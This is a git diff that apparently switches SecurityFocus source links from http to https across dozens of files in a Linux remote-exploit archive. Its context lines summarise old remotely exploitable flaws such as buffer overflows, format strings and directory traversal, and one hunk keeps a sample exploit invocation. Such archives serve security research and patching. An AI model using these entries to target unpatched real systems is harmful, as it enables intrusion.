99382bbaa..9bc5213a5 100755 --- a/exploits/linux/remote/20954.pl +++ b/exploits/linux/remote/20954.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2908/info +source: https://www.securityfocus.com/bid/2908/info eXtremail is a freeware SMTP server available for Linux and AIX. diff --git a/exploits/linux/remote/20994.txt b/exploits/linux/remote/20994.txt index 658109e1e..0d1bb362c 100644 --- a/exploits/linux/remote/20994.txt +++ b/exploits/linux/remote/20994.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2986/info +source: https://www.securityfocus.com/bid/2986/info poprelayd is a script that parses /var/log/maillog for valid pop logins, and based upon the login of a client, allows the person logged into the pop3 service to also send email from the ip address they're accessing the system with. diff --git a/exploits/linux/remote/20998.c b/exploits/linux/remote/20998.c index 64ede3bd5..89debf625 100644 --- a/exploits/linux/remote/20998.c +++ b/exploits/linux/remote/20998.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/3006/info +// source: https://www.securityfocus.com/bid/3006/info // // xloadimage is a utility used for displaying images of varying formats on X11 servers. // diff --git a/exploits/linux/remote/21017.txt b/exploits/linux/remote/21017.txt index 9123604c8..146bf05df 100644 --- a/exploits/linux/remote/21017.txt +++ b/exploits/linux/remote/21017.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3062/info +source: https://www.securityfocus.com/bid/3062/info Squid is a free client-side web proxy that retrieves cached web pages for quick browsers and a reduction in bandwidth consumption. diff --git a/exploits/linux/remote/21019.txt b/exploits/linux/remote/21019.txt index eba6feb98..127a4a262 100644 --- a/exploits/linux/remote/21019.txt +++ b/exploits/linux/remote/21019.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3067/info +source: https://www.securityfocus.com/bid/3067/info A vulnerability has been discovered in Horde Imp which may allow an attacker to access arbitrary system files. The issue occurs due to insufficient sanity checks on user-supplied URI parameters. diff --git a/exploits/linux/remote/21037.c b/exploits/linux/remote/21037.c index 954f5168d..84d10302a 100644 --- a/exploits/linux/remote/21037.c +++ b/exploits/linux/remote/21037.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3103/info +// source: https://www.securityfocus.com/bid/3103/info lpd is the print spooling daemon. It is used to support network printing on a variety of unix platforms. diff --git a/exploits/linux/remote/21049.c b/exploits/linux/remote/21049.c index b3bedb011..90a4aaaf4 100644 --- a/exploits/linux/remote/21049.c +++ b/exploits/linux/remote/21049.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3158/info +// source: https://www.securityfocus.com/bid/3158/info NCSA HTTPd is a free, open-source web server for *nix systems. diff --git a/exploits/linux/remote/21050.c b/exploits/linux/remote/21050.c index 7d5d9578a..cf627c4d3 100644 --- a/exploits/linux/remote/21050.c +++ b/exploits/linux/remote/21050.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3158/info +// source: https://www.securityfocus.com/bid/3158/info NCSA HTTPd is a free, open-source web server for *nix systems. diff --git a/exploits/linux/remote/21075.txt b/exploits/linux/remote/21075.txt index 4d50f9ac6..20abc8d9f 100644 --- a/exploits/linux/remote/21075.txt +++ b/exploits/linux/remote/21075.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3208/info +source: https://www.securityfocus.com/bid/3208/info An input validation error exists in sdb, the SuSE Support Data Base. diff --git a/exploits/linux/remote/21095.txt b/exploits/linux/remote/21095.txt index 722f8f43d..bae59a6aa 100644 --- a/exploits/linux/remote/21095.txt +++ b/exploits/linux/remote/21095.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3241/info +source: https://www.securityfocus.com/bid/3241/info 'dvips' is a utility that converts DVI documents to PostScript. It is an optional component of the TeTeX text formatting package. When installed on a system where LPRnG and TeTeX are in use, 'dvips' will be invoked by 'lpd' when a DVI document is to be printed if a printfilter exists for it. diff --git a/exploits/linux/remote/21112.php b/exploits/linux/remote/21112.php index c24934b74..bff7d9791 100644 --- a/exploits/linux/remote/21112.php +++ b/exploits/linux/remote/21112.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3335/info +source: https://www.securityfocus.com/bid/3335/info Versions of Apache webserver shipping with Red Hat Linux 7.0 (and possibly other Apache distributions) install with a default misconfiguration which could allow remote users to determine whether a give username exists on the vulnerable system. diff --git a/exploits/linux/remote/21151.txt b/exploits/linux/remote/21151.txt index ad8d11ba9..ed6350a3a 100644 --- a/exploits/linux/remote/21151.txt +++ b/exploits/linux/remote/21151.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3525/info +source: https://www.securityfocus.com/bid/3525/info IMP is a powerful web-based mail interface/client developed by members of the Horde project. diff --git a/exploits/linux/remote/21152.c b/exploits/linux/remote/21152.c index 4dcdc2e91..ec0bd047b 100644 --- a/exploits/linux/remote/21152.c +++ b/exploits/linux/remote/21152.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3526/info +// source: https://www.securityfocus.com/bid/3526/info ActivePerl is an implementation of the Perl scripting language for Microsoft Windows systems developed by Activestate. ActivePerl allows for high-performance integration with IIS using a DLL called 'perlIIS.dll' to handle a '.plx' ISAPI extension. diff --git a/exploits/linux/remote/21192.c b/exploits/linux/remote/21192.c index 5c5741587..8d7bfe31c 100644 --- a/exploits/linux/remote/21192.c +++ b/exploits/linux/remote/21192.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3748/info +// source: https://www.securityfocus.com/bid/3748/info Stunnel is a freely available, open source cryptography wrapper. It is designed to wrap arbitrary protocols that may or may not support cryptography. It is maintained by the Stunnel project. diff --git a/exploits/linux/remote/21200.c b/exploits/linux/remote/21200.c index 49ae65467..a4c90119e 100644 --- a/exploits/linux/remote/21200.c +++ b/exploits/linux/remote/21200.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3780/info +// source: https://www.securityfocus.com/bid/3780/info Net-SNMP is a package of software tools related to the Simple Network Management Protocol. One of the tools included is snmpnetstat, which can be used to retrieve and display a variety of information about a remote SNMP host. diff --git a/exploits/linux/remote/21205.c b/exploits/linux/remote/21205.c index 4f4b37d9b..b79934461 100644 --- a/exploits/linux/remote/21205.c +++ b/exploits/linux/remote/21205.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3787/info +// source: https://www.securityfocus.com/bid/3787/info Boozt! is a free open source banner management software for Linux hosts. diff --git a/exploits/linux/remote/21210.txt b/exploits/linux/remote/21210.txt index 7981c6d39..68e7ef575 100644 --- a/exploits/linux/remote/21210.txt +++ b/exploits/linux/remote/21210.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3830/info +source: https://www.securityfocus.com/bid/3830/info X-Chat is a graphical client for IRC. It requires the GTK+ toolkit, and is available for many Linux and Unix operating systems. diff --git a/exploits/linux/remote/21242.c b/exploits/linux/remote/21242.c index ba2d54c86..d577d31a5 100644 --- a/exploits/linux/remote/21242.c +++ b/exploits/linux/remote/21242.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3958/info +// source: https://www.securityfocus.com/bid/3958/info A vulnerability exists within some versions of rsync. Under some circumstances, a remotely supplied signed value is used as an array index, allowing NULL bytes to be written to arbitrary memory locations. Exploitation of this vulnerability could lead to the corruption of the stack, and possibly to execution of arbitrary code as the root user. diff --git a/exploits/linux/remote/21289.c b/exploits/linux/remote/21289.c index 0826d771d..79083f276 100644 --- a/exploits/linux/remote/21289.c +++ b/exploits/linux/remote/21289.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4104/info +// source: https://www.securityfocus.com/bid/4104/info Ettercap is a multipurpose packet sniffer for Linux and BSD based systems. It includes support for features such as character injection and packet filtering. Ettercap has been ported to Windows. diff --git a/exploits/linux/remote/21309.c b/exploits/linux/remote/21309.c index bca33e50d..2a8cd2372 100644 --- a/exploits/linux/remote/21309.c +++ b/exploits/linux/remote/21309.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4193/info +// source: https://www.securityfocus.com/bid/4193/info xtell is a simple network messaging program. It may be used to transmit terminal messages between users and machines. xtell is available for Linux, BSD and most other Unix based operating systems. diff --git a/exploits/linux/remote/21310.txt b/exploits/linux/remote/21310.txt index 0cf3758a9..4709735d1 100644 --- a/exploits/linux/remote/21310.txt +++ b/exploits/linux/remote/21310.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4196/info +source: https://www.securityfocus.com/bid/4196/info xtell is a simple network messaging program. It may be used to transmit terminal messages between users and machines. xtell is available for Linux, BSD and most other Unix based operating systems. diff --git a/exploits/linux/remote/21365.txt b/exploits/linux/remote/21365.txt index 9d25dc368..2eb628ccd 100644 --- a/exploits/linux/remote/21365.txt +++ b/exploits/linux/remote/21365.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4424/info +source: https://www.securityfocus.com/bid/4424/info PHPGroupWare is a freely available, open source groupware system written in PHP. It is distributed and maintained by the PHPGroupWare project. diff --git a/exploits/linux/remote/21402.txt b/exploits/linux/remote/21402.txt index a52bbad9a..19b14d320 100644 --- a/exploits/linux/remote/21402.txt +++ b/exploits/linux/remote/21402.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4560/info +source: https://www.securityfocus.com/bid/4560/info A buffer overflow condition exists in the OpenSSH server. The condition is exploitable by attackers with valid user credentials in versions 2.9.9 and higher. Exploitation does not require valid user credentials in versions prior to 2.9.9. diff --git a/exploits/linux/remote/21422.txt b/exploits/linux/remote/21422.txt index f9af971dc..ed8a903e1 100644 --- a/exploits/linux/remote/21422.txt +++ b/exploits/linux/remote/21422.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4601/info +source: https://www.securityfocus.com/bid/4601/info thttpd is a web server product maintained by ACME Labs. thttpd has been compiled for Linux, BSD and Solaris, as well as other Unix like operating systems. diff --git a/exploits/linux/remote/21442.c b/exploits/linux/remote/21442.c index 9a5b34928..68c759116 100644 --- a/exploits/linux/remote/21442.c +++ b/exploits/linux/remote/21442.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4713/info +// source: https://www.securityfocus.com/bid/4713/info Wu-imapd is vulnerable to a buffer overflow condition. This has been reported to occur when a valid user requests partial mailbox attributes. Exploitation may result in the execution of arbitrary code as the server process. An attacker may also be able to crash the server, resulting in a denial of service condition. diff --git a/exploits/linux/remote/21443.c b/exploits/linux/remote/21443.c index 12f3795f6..69523b2fd 100644 --- a/exploits/linux/remote/21443.c +++ b/exploits/linux/remote/21443.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4713/info +// source: https://www.securityfocus.com/bid/4713/info Wu-imapd is vulnerable to a buffer overflow condition. This has been reported to occur when a valid user requests partial mailbox attributes. Exploitation may result in the execution of arbitrary code as the server process. An attacker may also be able to crash the server, resulting in a denial of service condition. diff --git a/exploits/linux/remote/21586.txt b/exploits/linux/remote/21586.txt index 8a71902c0..58066cd7b 100644 --- a/exploits/linux/remote/21586.txt +++ b/exploits/linux/remote/21586.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5129/info +source: https://www.securityfocus.com/bid/5129/info E-Guest guest book is a freely available, open source guest book. It is designed for Unix and Linux operating systems. diff --git a/exploits/linux/remote/21602.txt b/exploits/linux/remote/21602.txt index 1e8e101e6..a7f07e5bc 100644 --- a/exploits/linux/remote/21602.txt +++ b/exploits/linux/remote/21602.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5189/info +source: https://www.securityfocus.com/bid/5189/info Icecast is a freely available, open source streaming audio server. Icecast is available for the Unix, Linux, and Microsoft Windows platforms. diff --git a/exploits/linux/remote/21604.txt b/exploits/linux/remote/21604.txt index 845536625..dcca6ea53 100644 --- a/exploits/linux/remote/21604.txt +++ b/exploits/linux/remote/21604.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5193/info +source: https://www.securityfocus.com/bid/5193/info A vulnerability has been reported for Apache Tomcat 4.0.3 on Microsoft Windows and Linux platforms. Reportedly, it is possible for an attacker to launch a cross site scripting attack. diff --git a/exploits/linux/remote/21663.c b/exploits/linux/remote/21663.c index 563800ddf..519331a43 100644 --- a/exploits/linux/remote/21663.c +++ b/exploits/linux/remote/21663.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5351/info +// source: https://www.securityfocus.com/bid/5351/info Fake Identd is an open source Ident server designed to return the same information to all incoming requests. It is implemented by Tomi Ollila, and available for Linux and a number of other Unix based operating systems. diff --git a/exploits/linux/remote/21706.txt b/exploits/linux/remote/21706.txt index e6c8f625f..2aa1fe259 100644 --- a/exploits/linux/remote/21706.txt +++ b/exploits/linux/remote/21706.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5453/info +source: https://www.securityfocus.com/bid/5453/info A vulnerability has been reported for Interchange 4.8.5 and earlier. Reportedly, Interchange may disclose contents of files to attackers. diff --git a/exploits/linux/remote/21722.pl b/exploits/linux/remote/21722.pl index 1d3bc5619..bc7350d46 100755 --- a/exploits/linux/remote/21722.pl +++ b/exploits/linux/remote/21722.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5499/info +source: https://www.securityfocus.com/bid/5499/info A CRLF injection vulnerability has been reported for Lynx that may allow an attacker to include extra HTTP headers when viewing web pages. If Lynx is called from the command line, carriage return and line feed (CRLF) characters may be included in the specified URL. These characters are not escaped when the input is used to construct a HTTP request. diff --git a/exploits/linux/remote/21725.c b/exploits/linux/remote/21725.c index 88c3f58cf..de6c6b459 100644 --- a/exploits/linux/remote/21725.c +++ b/exploits/linux/remote/21725.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/5503/info +source: https://www.securityfocus.com/bid/5503/info MySQL is is an open source relational database project, and is available for a number of operating systems, including Microsoft Windows. diff --git a/exploits/linux/remote/21726.c b/exploits/linux/remote/21726.c index 5643112da..b3207ad90 100644 --- a/exploits/linux/remote/21726.c +++ b/exploits/linux/remote/21726.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/5503/info +source: https://www.securityfocus.com/bid/5503/info MySQL is is an open source relational database project, and is available for a number of operating systems, including Microsoft Windows. diff --git a/exploits/linux/remote/21765.pl b/exploits/linux/remote/21765.pl index 8bc72da6c..d32a273a2 100755 --- a/exploits/linux/remote/21765.pl +++ b/exploits/linux/remote/21765.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5591/info +source: https://www.securityfocus.com/bid/5591/info In cases where users of Webmin do not have root access on the underlying host, it may be possible to mount privilege escalation attacks on the underlying host. This normally occurs in configurations where multiple Webmin client systems have access to a centralized Webmin server. diff --git a/exploits/linux/remote/21784.c b/exploits/linux/remote/21784.c index ca0316d0b..9849d351a 100644 --- a/exploits/linux/remote/21784.c +++ b/exploits/linux/remote/21784.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5680/info +// source: https://www.securityfocus.com/bid/5680/info Netris is prone to a remotely exploitable memory corruption issue. @@ -16,7 +16,7 @@ Netris is prone to a remotely exploitable memory corruption issue. An attacker m * cc xnetris.c -o xnetris * * * * this exploits the netris buffer overflow found roughly a year * - * ago(http://www.securityfocus.com/bid/5680), and recently * + * ago(https://www.securityfocus.com/bid/5680), and recently * * brought up again, in client-side form. (same code) * * * * when the MyEventType() function is done, the contents of the * diff --git a/exploits/linux/remote/21818.c b/exploits/linux/remote/21818.c index aec2148c8..48ab60967 100644 --- a/exploits/linux/remote/21818.c +++ b/exploits/linux/remote/21818.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5774/info +// source: https://www.securityfocus.com/bid/5774/info Null httpd is a small multithreaded web server for Linux and Windows, mantained by NullLogic. diff --git a/exploits/linux/remote/21857.pl b/exploits/linux/remote/21857.pl index bf621b355..f6a1ae748 100755 --- a/exploits/linux/remote/21857.pl +++ b/exploits/linux/remote/21857.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5792/info +source: https://www.securityfocus.com/bid/5792/info Monkey HTTP server is prone to a directory-traversal bug that may allow attackers to access sensitive files. diff --git a/exploits/linux/remote/21858.txt b/exploits/linux/remote/21858.txt index 25ec30038..dbb305ca1 100644 --- a/exploits/linux/remote/21858.txt +++ b/exploits/linux/remote/21858.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5793/info +source: https://www.securityfocus.com/bid/5793/info acWEB is prone to cross-site scripting attacks. It is possible to construct a malicious link to the web server which contains arbitrary script code. When the link is visited, the script code will be executed in the web client of the user visiting the link. The code will be executed in the context of the webserver. diff --git a/exploits/linux/remote/21870.txt b/exploits/linux/remote/21870.txt index f954d8d0e..89fd08608 100644 --- a/exploits/linux/remote/21870.txt +++ b/exploits/linux/remote/21870.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5806/info +source: https://www.securityfocus.com/bid/5806/info A vulnerability has been reported for Zope 2.5.1 and earlier. Reportedly, Zope does not handle XML-RPC requests properly. Specially crafted XML-RPC requests may cause Zope to respond to a request with an error page with system specific details. diff --git a/exploits/linux/remote/21934.txt b/exploits/linux/remote/21934.txt index f95268444..d646cf98f 100644 --- a/exploits/linux/remote/21934.txt +++ b/exploits/linux/remote/21934.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5951/info +source: https://www.securityfocus.com/bid/5951/info A vulnerability has been discovered in the kpf file sharing utility. KDE is available for the Linux operating system. diff --git a/exploits/linux/remote/21936.c b/exploits/linux/remote/21936.c index 848446e16..6fa6ab7fe 100644 --- a/exploits/linux/remote/21936.c +++ b/exploits/linux/remote/21936.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5956/info +// source: https://www.securityfocus.com/bid/5956/info ATP httpd is a lightweight HTTP server. A vulnerability has been reported in ATP httpd that may result in compromise of root access to remote attackers. It is possible to overwrite the least significant byte of the saved base pointer with a NULL if a string of maximum length is transmitted to the server. This creates a potentially exploitable condition if the saved base pointer is corrupted such that it points to attacker-controlled memory. diff --git a/exploits/linux/remote/21937.c b/exploits/linux/remote/21937.c index a7f08995b..383f4e2b2 100644 --- a/exploits/linux/remote/21937.c +++ b/exploits/linux/remote/21937.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5960/info +// source: https://www.securityfocus.com/bid/5960/info A buffer overflow has been reported in ghttpd which will allow arbitrary code to be executed with the privileges of the webserver. diff --git a/exploits/linux/remote/21945.pl b/exploits/linux/remote/21945.pl index 0dcfe05ad..b5aa7fcb8 100755 --- a/exploits/linux/remote/21945.pl +++ b/exploits/linux/remote/21945.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5988/info +source: https://www.securityfocus.com/bid/5988/info PlanetWeb is a commercially available web server integrated with dynamic DNS services. It is distributed by PlanetDNS, and available for Microsoft Operating Systems. diff --git a/exploits/linux/remote/21998.c b/exploits/linux/remote/21998.c index 06e153987..b156966cb 100644 --- a/exploits/linux/remote/21998.c +++ b/exploits/linux/remote/21998.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6141/info +// source: https://www.securityfocus.com/bid/6141/info A vulnerability has been discovered in CGIEmail. It should be noted that this vulnerability exists only if the server allows queries to remote hosts. diff --git a/exploits/linux/remote/22012.c b/exploits/linux/remote/22012.c index bb6f2c244..59b996dd3 100644 --- a/exploits/linux/remote/22012.c +++ b/exploits/linux/remote/22012.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6162/info +// source: https://www.securityfocus.com/bid/6162/info Light httpd is prone to a remotely exploitable buffer overflow condition. This overflow can be triggered by sending the server an excessively long GET request. As Light httpd drops user privileges when running, exploitation of this issue may result in the execution of arbitrary attacker-supplied commands with the privileges of the 'nobody' user. diff --git a/exploits/linux/remote/22013.c b/exploits/linux/remote/22013.c index b4b79650e..3dd26d9bd 100644 --- a/exploits/linux/remote/22013.c +++ b/exploits/linux/remote/22013.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6162/info +// source: https://www.securityfocus.com/bid/6162/info Light httpd is prone to a remotely exploitable buffer overflow condition. This overflow can be triggered by sending the server an excessively long GET request. As Light httpd drops user privileges when running, exploitation of this issue may result in the execution of arbitrary attacker-supplied commands with the privileges of the 'nobody' user. diff --git a/exploits/linux/remote/22016.c b/exploits/linux/remote/22016.c index a78465e86..3ceab1780 100644 --- a/exploits/linux/remote/22016.c +++ b/exploits/linux/remote/22016.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6172/info +// source: https://www.securityfocus.com/bid/6172/info LibHTTPD is vulnerable to a buffer overflow condition. By passing a POST request of excessive length, it is possible to overrun a static buffer. This may result in sensitive locations in memory being overwritten by attacker-supplied values. diff --git a/exploits/linux/remote/22021.sh b/exploits/linux/remote/22021.sh index 6e8efa20a..9c2ea5df1 100755 --- a/exploits/linux/remote/22021.sh +++ b/exploits/linux/remote/22021.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6190/info +source: https://www.securityfocus.com/bid/6190/info Zeroo HTTP server is a freely available, open source web server. It is available for the Linux and Microsoft Windows platforms. diff --git a/exploits/linux/remote/22026.txt b/exploits/linux/remote/22026.txt index 9c3b8840b..06a97eb43 100644 --- a/exploits/linux/remote/22026.txt +++ b/exploits/linux/remote/22026.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6204/info +source: https://www.securityfocus.com/bid/6204/info A HTML injection vulnerability has been discovered in Mhonarc. diff --git a/exploits/linux/remote/22034.pl b/exploits/linux/remote/22034.pl index 12e8be611..f6b49bdc6 100755 --- a/exploits/linux/remote/22034.pl +++ b/exploits/linux/remote/22034.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6240/info +source: https://www.securityfocus.com/bid/6240/info A remotely exploitable heap corruption vulnerability has been reported for WSMP3. diff --git a/exploits/linux/remote/22035.c b/exploits/linux/remote/22035.c index ac12f49c3..fe883a501 100644 --- a/exploits/linux/remote/22035.c +++ b/exploits/linux/remote/22035.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6240/info +// source: https://www.securityfocus.com/bid/6240/info A remotely exploitable heap corruption vulnerability has been reported for WSMP3. diff --git a/exploits/linux/remote/22046.c b/exploits/linux/remote/22046.c index 5b8862bcd..36b09d6d5 100644 --- a/exploits/linux/remote/22046.c +++ b/exploits/linux/remote/22046.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6255/info +// source: https://www.securityfocus.com/bid/6255/info A heap corruption vulnerability has been discovered in Null httpd. By passing a small content length value to the server and triggering the server to make a second recv() of POST data, it is possible to overrun a buffer. diff --git a/exploits/linux/remote/22057.pl b/exploits/linux/remote/22057.pl index c20c48da6..77ab907a1 100755 --- a/exploits/linux/remote/22057.pl +++ b/exploits/linux/remote/22057.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6286/info +source: https://www.securityfocus.com/bid/6286/info A buffer overflow vulnerability has been reported in Pserv. The buffer overflow condition is due to the way Pserv handles data streams from remote connections. diff --git a/exploits/linux/remote/22058.c b/exploits/linux/remote/22058.c index 1a28d5f2b..1737d31af 100644 --- a/exploits/linux/remote/22058.c +++ b/exploits/linux/remote/22058.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6286/info +// source: https://www.securityfocus.com/bid/6286/info A buffer overflow vulnerability has been reported in Pserv. The buffer overflow condition is due to the way Pserv handles data streams from remote connections. @@ -8,7 +8,7 @@ An attacker can exploit this vulnerability by issuing a HTTP request with an ove *pServ 2.0.x beta:webserver remote buffer overflow exploit by jsk *The aim of pServ (pico Server) is to create a portable, small webserver. *i want a sec webserver. so test some webserver. -*meet http://www.securityfocus.com/bid/6286 +*meet https://www.securityfocus.com/bid/6286 *Modified and exploit it..hehe... *ths #ph4nt0m irc.0x557.org all #cheese *[root@localhost tmp]# ./jsk -h 127.0.0.1 -p 2000 -t 0 diff --git a/exploits/linux/remote/22063.c b/exploits/linux/remote/22063.c index 275882967..f9b4306ce 100644 --- a/exploits/linux/remote/22063.c +++ b/exploits/linux/remote/22063.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6308/info +// source: https://www.securityfocus.com/bid/6308/info It has been reported that Zeroo fails to properly sanitize web requests. By sending a malicious web request to the vulnerable server, using directory traversal sequences, it is possible for a remote attacker to access sensitive resources located outside of the web root. diff --git a/exploits/linux/remote/22064.pl b/exploits/linux/remote/22064.pl index 4f78d27d7..8982e3e58 100755 --- a/exploits/linux/remote/22064.pl +++ b/exploits/linux/remote/22064.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6308/info +source: https://www.securityfocus.com/bid/6308/info It has been reported that Zeroo fails to properly sanitize web requests. By sending a malicious web request to the vulnerable server, using directory traversal sequences, it is possible for a remote attacker to access sensitive resources located outside of the web root. diff --git a/exploits/linux/remote/22072.c b/exploits/linux/remote/22072.c index 19a39d511..47e24dc1c 100644 --- a/exploits/linux/remote/22072.c +++ b/exploits/linux/remote/22072.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6326/info +// source: https://www.securityfocus.com/bid/6326/info The RaQ4 is a server appliance distributed and maintained by Sun Microsystems. diff --git a/exploits/linux/remote/22091.c b/exploits/linux/remote/22091.c index 912b5e7f6..4bbb0888e 100644 --- a/exploits/linux/remote/22091.c +++ b/exploits/linux/remote/22091.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6402/info +// source: https://www.securityfocus.com/bid/6402/info zkfingerd is prone to a format string vulnerability. This problem is due to incorrect use of the 'syslog()' function to log error messages. It is possible to corrupt memory by passing format strings through the vulnerable logging function. This may potentially be exploited to overwrite arbitrary locations in memory with attacker-specified values. diff --git a/exploits/linux/remote/22101.c b/exploits/linux/remote/22101.c index b66b0cb9c..754b09ca0 100644 --- a/exploits/linux/remote/22101.c +++ b/exploits/linux/remote/22101.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6404/info +// source: https://www.securityfocus.com/bid/6404/info zkfingerd is prone to a format string vulnerability. The affected function does not perform sufficient checks when displaying user-supplied input. It is possible to corrupt memory by passing format strings through the vulnerable function. This may potentially be exploited to overwrite arbitrary locations in memory with attacker-specified values. diff --git a/exploits/linux/remote/22106.txt b/exploits/linux/remote/22106.txt index d5330b204..d6bb0c63a 100644 --- a/exploits/linux/remote/22106.txt +++ b/exploits/linux/remote/22106.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6437/info +source: https://www.securityfocus.com/bid/6437/info A vulnerability has been reported for CUPS that if exploited may result in a DoS or the execute of code on affected systems. diff --git a/exploits/linux/remote/22129.c b/exploits/linux/remote/22129.c index f6864471c..0017a8958 100644 --- a/exploits/linux/remote/22129.c +++ b/exploits/linux/remote/22129.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/6527/info +source: https://www.securityfocus.com/bid/6527/info A vulnerability has been discovered in H-Sphere Webshell. During the pre-authentication phase Webshell fails to perform sufficient bounds checking on user-supplied HTTP parameters. As a result, a malicious attacker may be able to trigger a buffer overrun. diff --git a/exploits/linux/remote/22135.c b/exploits/linux/remote/22135.c index 84ee5fe6a..77d928a2a 100644 --- a/exploits/linux/remote/22135.c +++ b/exploits/linux/remote/22135.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6553/info +// source: https://www.securityfocus.com/bid/6553/info TANne is a freely available, open source session management package. It is available for Unix and Linux operating systems. diff --git a/exploits/linux/remote/22141.c b/exploits/linux/remote/22141.c index a01d655bb..92f10bf5c 100644 --- a/exploits/linux/remote/22141.c +++ b/exploits/linux/remote/22141.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/6580/info +// source: https://www.securityfocus.com/bid/6580/info // A format string vulnerability has been discovered in the Half-Life AdminMod plugin. The problem occurs in commands which call the selfmessage() function, which is used by other functions to write a message to the users console. The format string occurs when the System_Response() function is called by selfmessage() to log the administrative command. An 'rcon' authenticated user may be able to exploit this issue to overwrite sensitive locations in memory. diff --git a/exploits/linux/remote/22143.txt b/exploits/linux/remote/22143.txt index ad09d035f..65011b9bc 100644 --- a/exploits/linux/remote/22143.txt +++ b/exploits/linux/remote/22143.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6585/info +source: https://www.securityfocus.com/bid/6585/info WebWeaver's FTP component has a flaw which can permit a remote user to create directories outside the FTP root. diff --git a/exploits/linux/remote/22147.c b/exploits/linux/remote/22147.c index 1078bd3f0..ac93acea8 100644 --- a/exploits/linux/remote/22147.c +++ b/exploits/linux/remote/22147.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6593/info +// source: https://www.securityfocus.com/bid/6593/info A memory corruption vulnerability has been reported for mpg123 that may result in code execution. diff --git a/exploits/linux/remote/22187.txt b/exploits/linux/remote/22187.txt index 1f4f75135..9f69cb4e1 100644 --- a/exploits/linux/remote/22187.txt +++ b/exploits/linux/remote/22187.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6650/info +source: https://www.securityfocus.com/bid/6650/info CVS is prone to a double free vulnerability in the Directory requests. An attacker may potentially take advantage of this issue to cause heap memory to be corrupted with attacker-supplied values, which may result in execution of arbitrary code. diff --git a/exploits/linux/remote/22205.txt b/exploits/linux/remote/22205.txt index 185170da0..92e0e8fe3 100644 --- a/exploits/linux/remote/22205.txt +++ b/exploits/linux/remote/22205.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6721/info +source: https://www.securityfocus.com/bid/6721/info Apache Tomcat is prone to a directory/file disclosure vulnerability when used with JDK 1.3.1 or earlier. diff --git a/exploits/linux/remote/22264.txt 